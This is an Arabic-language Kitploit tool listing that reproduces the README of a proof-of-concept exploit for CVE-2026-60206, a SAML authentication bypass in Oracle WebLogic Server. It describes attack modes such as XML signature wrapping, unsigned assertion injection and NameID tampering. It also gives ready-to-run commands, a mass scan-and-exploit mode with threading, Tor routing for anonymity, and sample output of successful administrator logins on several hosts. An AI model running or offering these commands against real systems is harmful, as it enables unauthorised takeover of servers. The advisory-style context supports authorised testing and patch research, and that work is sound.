Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/debajyoti0-0/cve-2026-60206
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

تحليل تقني وإثبات مفهوم لثغرة CVE-2026-60206، وهي ثغرة حرجة لتجاوز المصادقة عبر SAML في Oracle WebLogic Server.

عرض المستودع
منذ 26 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-60206 – إثبات مفهوم لتجاوز مصادقة SAML في Oracle WebLogic Server

يوفر هذا المستودع كود استغلال لإثبات المفهوم لثغرة CVE‑2026‑60206، وهي ثغرة حرجة لتجاوز المصادقة في تنفيذ SAML الخاص بـ Oracle WebLogic Server. تسمح هذه الثغرة لمهاجم بعيد منخفض الصلاحيات باختراق الخادم بالكامل عن طريق تزوير تأكيدات SAML.

CVSS

⚠️ إخلاء مسؤولية: هذه الأداة مخصصة للبحث والاختبار الأمني المصرَّح به فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام.

شعار CVE-2026-60206

🔥 نظرة عامة على الثغرة

تؤثر CVE‑2026‑60206 على المكوّن الأساسي (Core) في Oracle WebLogic Server. يعود أصل الثغرة إلى المعالجة غير السليمة للمصادقة في تنفيذ بروتوكول SAML. تتيح نواقل هجوم متعددة — مثل التفاف توقيع XML (XSW)، وقبول التأكيدات غير الموقعة، والتلاعب بـ NameID، وتجاوز قيود الجمهور/الشروط — للمهاجم انتحال شخصية مستخدمين عشوائيين (مثل: weblogic) والحصول على وصول إداري.

الإصدارات المتأثرة:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

ينفّذ إثبات المفهوم (PoC) نواقل الهجوم التالية:

  • التفاف توقيع XML (XSW) – تلاعب بنيوي يجعل معالج SAML يقبل تأكيدًا غير موقّع.
  • حقن تأكيد غير موقّع – إنشاء استجابة SAML غير موقعة تمامًا (إذا لم يكن WantAssertionsSigned مفعَّلاً).
  • التلاعب بـ NameID – إرباك محدد الهوية (identity mapper) عبر تعليقات XML أو المسافات البيضاء أو إرباك التنسيق.
  • تجاوز قيد الجمهور (Audience Restriction) – إزالة عنصر AudienceRestriction أو تعديله لتوسيع النطاق.
  • تجاوز الشروط/الوقت – التلاعب بـ NotBefore/NotOnOrAfter لتجاوز فحوصات الصلاحية.
  • الهجوم المركّب – XSW + تأكيد داخلي غير موقّع + تلاعب بـ NameID (الأكثر ترجيحًا للنجاح).
  • إعادة التشغيل (Replay) – إعادة إرسال استجابة SAML ملتقطة مع تعديل الوجهة/المستلم.

✨ الميزات

  • أوضاع هجوم متعددة – اختر من بين all, unsigned, xsw, nameid, audience, conditions, combo أو replay.
  • فحص جماعي – اكتشاف متزامن واستغلال اختياري عبر أهداف متعددة (عبر -l).
  • اكتشاف الإصدار – تحديد بصمة إصدار WebLogic بدقة عبر الترويسات وصفحات الأخطاء و WSDL.
  • استكشاف نقاط نهاية SAML – اكتشاف تلقائي لنقاط نهاية ACS وبيانات التعريف (metadata) ونقاط نهاية بدء SP (SP‑initiated).
  • دعم Tor – توجيه حركة المرور عبر Tor (SOCKS5/HTTP/SOCKS4) لإخفاء الهوية.
  • إعادة إرسال طلبات HTTP خام – إرسال طلبات HTTP خام عشوائية من ملف (-r).
  • دعم HTTP/2 – يستخدم httpx تلقائيًا إذا كان مثبتًا، ويعود إلى requests (HTTP/1.1) كخيار احتياطي.

📦 التثبيت

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

مطلوب: requests, urllib3

اختياري (يحسّن الوظيفة):

  • httpx – لدعم HTTP/2
  • lxml – لتحسين تحليل SAML
  • signxml, cryptography – للتعامل مع التوقيعات (غير مطلوبة للاستغلال)

🚀 الاستخدام

هدف واحد – اكتشاف فقط

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

هدف واحد – تشغيل جميع نواقل الهجوم

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

هدف واحد – وضع هجوم محدد

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

فحص جماعي – اكتشاف الإصدارات من ملف

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

فحص جماعي – اكتشاف + استغلال

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

إعادة إرسال استجابة SAML ملتقطة

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

استخدام Tor والتحقق من الاتصال

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

إرسال طلب HTTP خام من ملف

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

فحص سريع للثغرة (بدون استغلال)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ مرجع الخيارات

الخيارات العامة:

الهدف:

Flagالوصف
-t, --target TARGETعنوان URL لهدف واحد (مثل: https://host:7002).
-l, --list LISTملف قائمة الأهداف للفحص الجماعي، أو عنوان URL واحد.

خيارات الطلب:

إعدادات الهجوم:

الفحص الجماعي (مع -l):

Flagالوصف
--exploitاختبار تأكيد SAML غير الموقّع (الافتراضي: اكتشاف فقط).
-T, --threads THREADSالخيوط المتزامنة (الافتراضي: 10).

المخرجات:

Flagالوصف
-v, --verboseزيادة مستوى التفصيل (مخرجات تصحيح).
-q, --quietكتم المخرجات غير الأساسية.

🧪 الأوضاع بالتفصيل

detect

ينفّذ اكتشاف الإصدار واستكشاف نقاط نهاية SAML. لا يتم إطلاق أي هجوم.

unsigned

يحقن تأكيد SAML غير موقّع تمامًا. إذا كان الهدف لا يفرض WantAssertionsSigned، فإن هذا يتجاوز المصادقة بالكامل.

الأنواع: unsigned (افتراضي)، unsigned_stripped (يزيل جميع مراجع التوقيع).

xsw (التفاف توقيع XML)

يضع تأكيدًا خبيثًا غير موقّع قبل (أو ملفوفًا حول) تأكيد موقّع صالح. قد يختار معالج SAML التأكيد الأول بينما يتحقق مُدقّق التوقيع من التأكيد الموقّع.

الأنواع: xsw1 (إضافة بسيطة في البداية)، xsw2 (نفس معرّف الأصل)، xsw3 (غلاف متداخل)، xsw4 (عنصر شقيق).

nameid

يتلاعب بحقل NameID لإرباك محدد الهوية في WebLogic، مما يسمح بانتحال شخصية مستخدم مختلف.

الأنواع: comment_injection, whitespace, format_confusion, xpath_injection.

audience

يتجاوز فحوصات AudienceRestriction عن طريق إزالة عنصر الجمهور أو تعديله.

الأنواع: remove_audience, wildcard_audience, extra_audience.

conditions

يتجاوز القيود الزمنية (مثل: NotBefore, NotOnOrAfter).

الأنواع: future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

يجمع بين XSW والتأكيد غير الموقّع والتلاعب بـ NameID في حمولة واحدة – وهو الناقل الأكثر ترجيحًا لتحقيق الاختراق الكامل.

الأنواع: combo_full (مع حقن تعليق)، combo_stealth (مع سطر جديد).

replay

يعيد إرسال استجابة SAML ملتقطة سابقًا، مع إمكانية تعديل الوجهة أو إزالة قيود الجمهور.

الأنواع: replay_modified (يضبط Destination/Recipient)، replay_cross_sp (يزيل قيود الجمهور).

📝 سير عمل مثال (استغلال هدف واحد)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 سير عمل مثال (فحص جماعي)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ بناء بيئة اختبار ضعيفة

لاختبار إثبات المفهوم هذا بأمان، قم بإعداد خادم WebLogic مع تفعيل SAML وباستخدام أحد الإصدارات المتأثرة. على سبيل المثال، يمكنك استخدام Docker:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

يجب أن يتضمن إعداد SAML موفر خدمة SAML 2.0 واحدًا على الأقل مع نقطة نهاية ACS (مثل: /saml2/sp/acs) وبيانات تعريف منشورة.

🔗 المراجع

  • نشرة Oracle لتحديث التصحيحات الحرجة لشهر يوليو 2026
  • تفاصيل CVE-2026-60206 – NIST NVD
  • CWE-287: مصادقة غير سليمة
  • تحليل أمان SAML 2.0 – التفاف توقيع XML

📜 الترخيص

هذا المشروع مرخّص بموجب رخصة GNU v3.0 – راجع ملف LICENSE للحصول على التفاصيل.

🤝 المساهمة

نرحب بالإبلاغ عن المشكلات (Issues) وطلبات السحب (Pull Requests). يرجى التأكد من أن مساهماتك تلتزم بنفس إرشادات الاستخدام الأخلاقية.

تذكّر: احصل دائمًا على التصريح المناسب قبل اختبار أي أداة أمنية. وابقَ أخلاقيًا!

تنزيل الأداة
  • تدوير User‑Agent – استخدام User‑Agent عشوائي أو مخصص.
  • دعم الوكيل (Proxy) – إرسال جميع الطلبات عبر وكيل HTTP/SOCKS.
  • تخصيص الطلبات – ضبط المهلات وعدد مرات إعادة المحاولة والتأخيرات وتعطيل عمليات إعادة التوجيه وإعادة المحاولة عند تطابق نمط regex.
  • حفظ الحمولات – حفظ حمولات SAML المولدة على القرص (--save-payloads).
  • فحص الثغرة (-c / --check) – تحديد سريع لما إذا كان الهدف عرضة للثغرة (بدون استغلال).
  • إخراج تقرير JSON/CSV – نتائج منظمة للفحوصات الجماعية.
  • تسجيل مفصّل – مخرجات تصحيح تفصيلية مع وحدة تحكم ملوّنة.
  • Flagالوصف
    -h, --helpعرض رسالة المساعدة والخروج.
    --proxy PROXYعنوان URL للوكيل (يُتجاوز بواسطة --tor إذا استُخدم).
    --no-verifyتعطيل التحقق من شهادة SSL.
    --cookie COOKIEملفات تعريف ارتباط الجلسة (مثل: name=value; name2=value2).
    --auth AUTHبيانات اعتماد المصادقة الأساسية (USER:PASS).
    -f, --file FILEاسم مستعار لـ --list.
    Flagالوصف
    -r, --requestfile REQUESTFILEتحميل طلب HTTP خام من ملف (يحل محل هجمات SAML).
    --method METHODطريقة HTTP التي سيتم استخدامها (للطلب الخام أو طلب واحد؛ الافتراضي: GET).
    --random-agentاستخدام User‑Agent عشوائي من القائمة المدمجة.
    -A, --user-agent USER_AGENTقيمة مخصصة لترويسة User‑Agent.
    --torاستخدام شبكة إخفاء الهوية Tor (SOCKS5 افتراضيًا).
    --tor-port TOR_PORTمنفذ وكيل Tor (الافتراضي: 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}نوع وكيل Tor (الافتراضي: SOCKS5).
    --check-torالتحقق من أن Tor يُستخدم بشكل صحيح (يخرج مع الحكم).
    --delay DELAYالتأخير بالثواني بين كل طلب.
    --timeout TIMEOUTالمهلة بالثواني (الافتراضي: 30).
    --retries RETRIESعدد مرات إعادة المحاولة عند انتهاء المهلة/الأخطاء (الافتراضي: 3).
    --retry-on RETRY_ONإعادة محاولة الطلب إذا تطابق محتوى الاستجابة مع نمط regex (مثل: 'captcha').
    -dr, --disable-redirectsتعطيل تتبع عمليات إعادة توجيه HTTP.
    Flagالوصف
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}وضع الهجوم (الافتراضي: all).
    --detectاكتشاف إصدار WebLogic وإعدادات SAML فقط (بدون هجوم).
    -c, --checkفحص سريع للثغرة (اكتشاف فقط، يخرج مع الحكم).
    -u, --user USERالمستخدم الهدف لانتحال شخصيته (الافتراضي: weblogic).
    --groups GROUPSالمجموعات التي ستُدرج في تأكيد SAML (الافتراضي: Administrators,Monitors).
    --issuer ISSUERمعرّف كيان المُصدِر (Issuer) في SAML.
    --audience AUDIENCEمعرّف كيان الجمهور (Audience) في SAML.
    --relay-state RELAY_STATEمعامل RelayState لإرسال SAML عبر POST.
    --base64ترميز استجابة SAML بترميز Base64 في POST.
    --extra-attrs [NAME=VALUE ...]سمات SAML إضافية (مثل: role=admin).
    --replay-file REPLAY_FILEمسار استجابة SAML ملتقطة لإعادة الإرسال.
    --save-payloadsحفظ حمولات SAML المولدة في ./payloads/.
    --continue-on-successمواصلة الاختبار بعد نجاح الهجوم.
    --list-modesعرض جميع أوضاع الهجوم مع أوصافها ثم الخروج.
    -o, --output OUTPUTكتابة تقرير JSON أو CSV إلى ملف.